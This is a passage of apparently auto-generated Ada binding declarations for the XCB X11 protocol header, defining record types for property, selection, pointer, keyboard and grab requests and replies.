array (0 .. 2) of aliased bits_stdint_uintn_h.uint8_t; type xcb_change_property_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1938 mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1939 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1940 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1941 property : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1942 c_type : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1943 format : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1944 pad0 : aliased xcb_change_property_request_t_array1897; -- /usr/include/xcb/xproto.h:1945 data_len : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1946 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1937 --* Opcode for xcb_delete_property. --* -- * @brief xcb_delete_property_request_t -- * type xcb_delete_property_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1956 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1957 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1958 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1959 property : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1960 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1955 type xcb_get_property_type_t is (XCB_GET_PROPERTY_TYPE_ANY) with Convention => C; -- /usr/include/xcb/xproto.h:1963 --* -- * @brief xcb_get_property_cookie_t -- * type xcb_get_property_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:1971 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1970 --* Opcode for xcb_get_property. --* -- * @brief xcb_get_property_request_t -- * type xcb_get_property_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1981 u_delete : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1982 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1983 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1984 property : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1985 c_type : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1986 long_offset : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1987 long_length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1988 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1980 --* -- * @brief xcb_get_property_reply_t -- * type xcb_get_property_reply_t_array2180 is array (0 .. 11) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_property_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1995 format : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1996 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1997 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1998 c_type : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1999 bytes_after : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2000 value_len : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2001 pad0 : aliased xcb_get_property_reply_t_array2180; -- /usr/include/xcb/xproto.h:2002 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1994 --* -- * @brief xcb_list_properties_cookie_t -- * type xcb_list_properties_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2009 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2008 --* Opcode for xcb_list_properties. --* -- * @brief xcb_list_properties_request_t -- * type xcb_list_properties_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2019 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2020 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2021 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2022 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2018 --* -- * @brief xcb_list_properties_reply_t -- * type xcb_list_properties_reply_t_array2015 is array (0 .. 21) of aliased bits_stdint_uintn_h.uint8_t; type xcb_list_properties_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2029 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2030 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2031 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2032 atoms_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2033 pad1 : aliased xcb_list_properties_reply_t_array2015; -- /usr/include/xcb/xproto.h:2034 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2028 --* Opcode for xcb_set_selection_owner. --* -- * @brief xcb_set_selection_owner_request_t -- * type xcb_set_selection_owner_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2044 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2045 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2046 owner : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2047 selection : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:2048 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2049 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2043 --* -- * @brief xcb_get_selection_owner_cookie_t -- * type xcb_get_selection_owner_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2056 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2055 --* Opcode for xcb_get_selection_owner. --* -- * @brief xcb_get_selection_owner_request_t -- * type xcb_get_selection_owner_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2066 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2067 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2068 selection : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:2069 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2065 --* -- * @brief xcb_get_selection_owner_reply_t -- * type xcb_get_selection_owner_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2076 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2077 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2078 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2079 owner : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2080 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2075 --* Opcode for xcb_convert_selection. --* -- * @brief xcb_convert_selection_request_t -- * type xcb_convert_selection_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2090 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2091 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2092 requestor : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2093 selection : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:2094 target : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:2095 property : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:2096 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2097 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2089 type xcb_send_event_dest_t is (XCB_SEND_EVENT_DEST_POINTER_WINDOW, XCB_SEND_EVENT_DEST_ITEM_FOCUS) with Convention => C; -- /usr/include/xcb/xproto.h:2100 --* Opcode for xcb_send_event. --* -- * @brief xcb_send_event_request_t -- * subtype xcb_send_event_request_t_array1030 is Interfaces.C.char_array (0 .. 31); type xcb_send_event_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2112 propagate : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2113 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2114 destination : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2115 event_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2116 event : aliased xcb_send_event_request_t_array1030; -- /usr/include/xcb/xproto.h:2117 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2111 type xcb_grab_mode_t is (XCB_GRAB_MODE_SYNC, XCB_GRAB_MODE_ASYNC) with Convention => C; -- /usr/include/xcb/xproto.h:2120 --*< The state of the keyboard appears to freeze: No further keyboard events are --generated by the server until the grabbing client issues a releasing --`AllowEvents` request or until the keyboard grab is released. --*< Keyboard event processing continues normally. type xcb_grab_status_t is (XCB_GRAB_STATUS_SUCCESS, XCB_GRAB_STATUS_ALREADY_GRABBED, XCB_GRAB_STATUS_INVALID_TIME, XCB_GRAB_STATUS_NOT_VIEWABLE, XCB_GRAB_STATUS_FROZEN) with Convention => C; -- /usr/include/xcb/xproto.h:2131 type xcb_cursor_enum_t is (XCB_CURSOR_NONE) with Convention => C; -- /usr/include/xcb/xproto.h:2139 --* -- * @brief xcb_grab_pointer_cookie_t -- * type xcb_grab_pointer_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2147 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2146 --* Opcode for xcb_grab_pointer. --* -- * @brief xcb_grab_pointer_request_t -- * type xcb_grab_pointer_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2157 owner_events : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2158 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2159 grab_window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2160 event_mask : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2161 pointer_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2162 keyboard_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2163 confine_to : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2164 cursor : aliased xcb_cursor_t; -- /usr/include/xcb/xproto.h:2165 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2166 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2156 --* -- * @brief xcb_grab_pointer_reply_t -- * type xcb_grab_pointer_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2173 status : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2174 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2175 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2176 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2172 --* Opcode for xcb_ungrab_pointer. --* -- * @brief xcb_ungrab_pointer_request_t -- * type xcb_ungrab_pointer_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2186 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2187 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2188 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2189 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2185 type xcb_button_index_t is (XCB_BUTTON_INDEX_ANY, XCB_BUTTON_INDEX_1, XCB_BUTTON_INDEX_2, XCB_BUTTON_INDEX_3, XCB_BUTTON_INDEX_4, XCB_BUTTON_INDEX_5) with Convention => C; -- /usr/include/xcb/xproto.h:2192 --*< Any of the following (or none): --*< The left mouse button. --*< The right mouse button. --*< The middle mouse button. --*< Scroll wheel. TODO: direction? --*< Scroll wheel. TODO: direction? --* Opcode for xcb_grab_button. --* -- * @brief xcb_grab_button_request_t -- * type xcb_grab_button_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2220 owner_events : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2221 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2222 grab_window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2223 event_mask : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2224 pointer_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2225 keyboard_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2226 confine_to : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2227 cursor : aliased xcb_cursor_t; -- /usr/include/xcb/xproto.h:2228 button : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2229 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2230 modifiers : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2231 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2219 --* Opcode for xcb_ungrab_button. --* -- * @brief xcb_ungrab_button_request_t -- * type xcb_ungrab_button_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_ungrab_button_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2241 button : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2242 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2243 grab_window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2244 modifiers : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2245 pad0 : aliased xcb_ungrab_button_request_t_array1823; -- /usr/include/xcb/xproto.h:2246 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2240 --* Opcode for xcb_change_active_pointer_grab. --* -- * @brief xcb_change_active_pointer_grab_request_t -- * type xcb_change_active_pointer_grab_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_change_active_pointer_grab_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2256 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2257 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2258 cursor : aliased xcb_cursor_t; -- /usr/include/xcb/xproto.h:2259 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2260 event_mask : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2261 pad1 : aliased xcb_change_active_pointer_grab_request_t_array1823; -- /usr/include/xcb/xproto.h:2262 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2255 --* -- * @brief xcb_grab_keyboard_cookie_t -- * type xcb_grab_keyboard_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2269 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2268 --* Opcode for xcb_grab_keyboard. --* -- * @brief xcb_grab_keyboard_request_t -- * type xcb_grab_keyboard_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_grab_keyboard_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2279 owner_events : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2280 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2281 grab_window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2282 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2283 pointer_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2284 keyboard_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2285 pad0 : aliased xcb_grab_keyboard_request_t_array1823; -- /usr/include/xcb/xproto.h:2286 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2278 --* -- * @brief xcb_grab_keyboard_reply_t -- * type xcb_grab_keyboard_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2293 status : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2294 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2295 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2296 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2292 --* Opcode for xcb_ungrab_keyboard. --* -- * @brief xcb_ungrab_keyboard_request_t -- * type xcb_ungrab_keyboard_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2306 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2307 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2308 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2309 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2305 type xcb_grab_t is (XCB_GRAB_ANY) with Convention => C; -- /usr/include/xcb/xproto.h:2312 --* Opcode for xcb_grab_key. --* -- * @brief xcb_grab_key_request_t -- * type xcb_grab_key_request_t_array1897 is array (0 .. 2) of aliased bits_stdint_uintn_h.uint8_t; type xcb_grab_key_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2323 owner_events : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2324 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2325 grab_window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2326 modifiers : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2327 key : aliased xcb_keycode_t; -- /usr/include/xcb/xproto.h:2328 pointer_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2329 keyboard_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2330 pad0 : aliased xcb_grab_key_request_t_array1897; -- /usr/include/xcb/xproto.h:2331 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2322 --* Opcode for xcb_ungrab_key. --* -- * @brief xcb_ungrab_key_request_t -- * type xcb_ungrab_key_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_ungrab_key_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2341 key : aliased xcb_keycode_t; -- /usr/include/xcb/xproto.h:2342 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2343 grab_window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2344 modifiers : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2345 pad0 : aliased xcb_ungrab_key_request_t_array1823; -- /usr/include/xcb/xproto.h:2346 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2340 type xcb_allow_t is (XCB_ALLOW_ASYNC_POINTER, XCB_ALLOW_SYNC_POINTER, XCB_ALLOW_REPLAY_POINTER, XCB_ALLOW_ASYNC_KEYBOARD, XCB_ALLOW_SYNC_KEYBOARD, XCB_ALLOW_REPLAY_KEYBOARD, XCB_ALLOW_ASYNC_BOTH, XCB_ALLOW_SYNC_BOTH) with Convention => C; -- /usr/include/xcb/xproto.h:2349 --*< For AsyncPointer, if the pointer is frozen by the client, pointer event --processing continues normally. If the pointer is frozen twice by the client on --behalf of two separate grabs, AsyncPointer thaws for both. AsyncPointer has no --effect if the pointer is not frozen by the client, but the pointer need not be --grabbed by the client. --TODO: rewrite this in more understandable terms. --*< For SyncPointer, if the pointer is frozen and actively grabbed by the client, --pointer event processing continues normally until the next ButtonPress or --ButtonRelease event is reported to the client, at which time the pointer again --appears to freeze. However, if the reported event causes the pointer grab to be --released, then the pointer does not freeze. SyncPointer has no effect if the --pointer is not frozen by the client or if the pointer is not grabbed by the --client. --*< For ReplayPointer, if the pointer is actively grabbed by the client and is --frozen as the result of an event having been sent to the client (either from --the activation of a GrabButton or from a previous AllowEvents with mode --SyncPointer but not from a GrabPointer), then the pointer grab is released and --that event is completely reprocessed, this time ignoring any passive grabs at --or above (towards the root) the grab-window of the grab just released. The --request has no effect if the pointer is not grabbed by the client or if the --pointer is not frozen as the result of an event. --*< For AsyncKeyboard, if the keyboard is frozen by the client, keyboard event --processing continues normally. If the keyboard is frozen twice by the client on --behalf of two separate grabs, AsyncKeyboard thaws for both. AsyncKeyboard has --no effect if the keyboard is not frozen by the client, but the keyboard need --not be grabbed by the client. --*< For SyncKeyboard, if the keyboard is frozen and actively grabbed by the client, --keyboard event processing continues normally until the next KeyPress or --KeyRelease event is reported to the client, at which time the keyboard again --appears to freeze. However, if the reported event causes the keyboard grab to --be released, then the keyboard does not freeze. SyncKeyboard has no effect if --the keyboard is not frozen by the client or if the keyboard is not grabbed by --the client. --*< For ReplayKeyboard, if the keyboard is actively grabbed by the client and is --frozen as the result of an event having been sent to the client (either from --the activation of a GrabKey or from a previous AllowEvents with mode --SyncKeyboard but not from a GrabKeyboard), then the keyboard grab is released --and that event is completely reprocessed, this time ignoring any passive grabs --at or above (towards the root) the grab-window of the grab just released. The --request has no effect if the keyboard is not grabbed by the client or if the --keyboard is not frozen as the result of an event. --*< For AsyncBoth, if the pointer and the keyboard are frozen by the client, event --processing for both devices continues normally. If a device is frozen twice by --the client on behalf of two separate grabs, AsyncBoth thaws for both. AsyncBoth --has no effect unless both pointer and keyboard are frozen by the client. --*< For SyncBoth, if both pointer and keyboard are frozen by the client, event --processing (for both devices) continues normally until the next ButtonPress, --ButtonRelease, KeyPress, or KeyRelease event is reported to the client for a --grabbed device (button event for the pointer, key event for the keyboard), at --which time the devices again appear to freeze. However, if the reported event --causes the grab to be released, then the devices do not freeze (but if the --other device is still grabbed, then a subsequent event for it will still cause --both devices to freeze). SyncBoth has no effect unless both pointer and --keyboard are frozen by the client. If the pointer or keyboard is frozen twice --by the client on behalf of two separate grabs, SyncBoth thaws for both (but a --subsequent freeze for SyncBoth will only freeze each device once). --* Opcode for xcb_allow_events. --* -- * @brief xcb_allow_events_request_t -- * type xcb_allow_events_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2432 mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2433 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2434 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2435 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2431 --* Opcode for xcb_grab_server. --* -- * @brief xcb_grab_server_request_t -- * type xcb_grab_server_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2445 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2446 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2447 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2444 --* Opcode for xcb_ungrab_server. --* -- * @brief xcb_ungrab_server_request_t -- * type xcb_ungrab_server_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2457 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2458 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2459 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2456 --* -- * @brief xcb_query_pointer_cookie_t -- * type xcb_query_pointer_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2466 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2465 --* Opcode for xcb_query_pointer. --* -- * @brief xcb_query_pointer_request_t -- * type xcb_query_pointer_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2476 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2477 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2478 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2479 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2475 --* -- * @brief xcb_query_pointer_reply_t -- * type xcb_query_pointer_reply_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_query_pointer_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2486 same_screen : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2487 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2488 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2489 root : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2490 child : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2491 root_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2492 root_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2493 win_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2494 win_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2495 mask : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2496 pad0 : aliased xcb_query_pointer_reply_t_array1823; -- /usr/include/xcb/xproto.h:2497 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2485 --* -- * @brief xcb_timecoord_t -- * type xcb_timecoord_t is record time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2504 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2505 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2506 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2503 --* -- * @brief xcb_timecoord_iterator_t -- * type xcb_timecoord_iterator_t is record data : access xcb_timecoord_t; -- /usr/include/xcb/xproto.h:2513 c_rem : aliased int; -- /usr/include/xcb/xproto.h:2514 index : aliased int; -- /usr/include/xcb/xproto.h:2515 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2512 --* -- * @brief xcb_get_motion_events_cookie_t -- * type xcb_get_motion_events_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2522 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2521 --* Opcode for xcb_get_motion_events. --* -- * @brief xcb_get_motion_events_request_t -- * type xcb_get_motion_events_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2532 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2533 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2534 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2535 start : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2536 stop : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2537 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2531 --* -- * @brief xcb_get_motion_events_reply_t -- * type xcb_get_motion_events_reply_t_array1992 is array (0 .. 19) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_motion_events_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2544 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2545 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2546 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2547 events_len : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2548 pad1 : aliased xcb_get_motion_events_reply_t_array1992; -- /usr/include/xcb/xproto.h:2549 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2543 --* -- * @brief xcb_translate_coordinates_cookie_t -- * type xcb_translate_coordinates_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2556 end record with Convention => C_Pass_By_Copy; -- 